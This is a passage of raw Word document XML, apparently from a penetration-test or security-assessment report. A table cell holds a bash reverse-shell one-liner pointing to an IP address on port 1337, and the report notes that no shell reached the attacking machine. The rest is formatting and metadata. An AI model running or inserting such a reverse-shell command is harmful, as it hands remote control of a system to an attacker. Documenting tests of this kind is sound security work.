            <w:r w:rsidRPr="00575769">
              <w:t>bash -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00575769">
              <w:t>tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00575769">
              <w:t>/169.254.143.217/1337 0&gt;&amp;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00F22136" w:rsidRPr="00315FD5" w:rsidRDefault="00575769" w:rsidP="00F22136">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>No shell was ever able to successfully reach the attacking machine.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F22136" w:rsidRPr="00315F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E57A8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FCA28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D1A00"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B33A2FD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69421C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42A29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11654"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F176C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074C0B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2BCB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555FC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BBFADCC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69E0FFA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3F42441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81D75B8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C248D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C971D8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9562416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FD5"/>
    <w:rsid w:val="000507F3"/>
    <w:rsid w:val="000D1C71"/>
    <w:rsid w:val="00116C98"/>
    <w:rsid w:val="001F1992"/>
    <w:rsid w:val="002532E2"/>
    <w:rsid w:val="002968BC"/>
    <w:rsid w:val="002B79F0"/>
    <w:rsid w:val="00303A3E"/>
    <w:rsid w:val="00315FD5"/>
    <w:rsid w:val="003A0359"/>
    <w:rsid w:val="00456785"/>
    <w:rsid w:val="00531B6A"/>
    <w:rsid w:val="005677C5"/>
    <w:rsid w:val="00575769"/>
    <w:rsid w:val="00590FC3"/>
    <w:rsid w:val="00674656"/>
    <w:rsid w:val="00776EDE"/>
    <w:rsid w:val="008E3206"/>
    <w:rsid w:val="00956864"/>
    <w:rsid w:val="00A063C4"/>
    <w:rsid w:val="00B30C0C"/>
    <w:rsid w:val="00BB76F5"/>
    <w:rsid w:val="00C45715"/>
    <w:rsid w:val="00D36A1D"/>
    <w:rsid w:val="00DE2258"/>
    <w:rsid w:val="00DE4F1B"/>
    <w:rsid w:val="00E942F6"/>
    <w:rsid w:val="00F22136"/>
    <w:rsid w:val="00F3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8CE2D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4037471F-531D-4EB2-8808-0B1B548CA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5F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15F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15F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15FD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15F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32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20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03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580</Words>
  <Characters>3510</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>71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128 Technology</Company>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>4040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Veterans</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Timothy Chabail</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-07-25T14:08:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-07-25T14:08:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>